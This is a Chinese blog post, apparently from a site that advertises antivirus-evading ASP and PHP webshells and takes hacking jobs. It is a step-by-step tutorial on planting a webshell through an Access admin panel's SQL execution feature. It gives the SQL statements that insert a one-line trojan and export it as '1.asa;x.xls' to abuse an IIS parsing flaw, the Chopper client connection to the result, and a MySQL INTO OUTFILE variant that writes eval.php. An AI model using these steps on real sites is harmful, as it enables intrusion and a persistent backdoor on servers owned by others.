火热虚拟主机提权专用Asp大马火热推荐免杀Asp木马隐藏防删 火热最经典Php大马解密版

火爆最新更新暗组免杀Php大马火爆免杀超越神界Asp大马下载 火爆免杀Asp草泥马4.0版

接单交流QQ群:136549649

ACCESS执行SQL语句导出一句话拿webshell

2012-10-19

实用环境,在Access后台其他方法不能拿到webshell
但是后台有SQL语句查询执行,就可以直接access导出一句话拿webshell了
不过需要知道物理路径才能导出,利用IIS的解析漏洞导出EXCEL文件拿到webshell,因为ACCESS数据库不允许导出其他危险格式。
至于怎么拿到物理路径就看你自己发挥了,报错或备份路径等。

逐一执行以下语句就可以导出一句话了
第一句代码
create table cmd (a varchar(50))
第二句代码
insert into cmd (a) values ('一句话木马')
第三句代码
select * into [a] in 'e:\web\mumaasp\1.asa;x.xls' 'excel 4.0;' from cmd

第四句代码
drop table cmd

直接菜刀里连接http://www.mumaasp.com/1.asa;x.xls

SQL语句意思解释:
第一句
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
第二句
在表cmd的a字段插入一句话木马
第三句
把cmd表a的内容导出到路径e:\web\mumaasp\的EXCEL文件
第四句
删除建立的cmd表

以下内容为测试:
Access利用后台SQL执行命令功能导出WebShell:
这个更简单:
Select 'asp一句话木马' into [vote] in 'e:\web\mumaasp\1.asa;x.xls' 'excel 8.0;' from vote或者
Select 'php一句话木马' into outfile 'F:/wwwroot/mumaasp.com/eval.php';
后台有执行SQL语句功能(vote为已知表段)

  • Asp免杀大马发布,转载请注明 : http://www.mumaasp.com/166.html
  • 分类:Asp大马后门 | 标签: | 5,309人 浏览

    发表评论

    电子邮件地址不会被公开。 必填项已用 * 标注

    *

    您可以使用这些 HTML 标签和属性: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>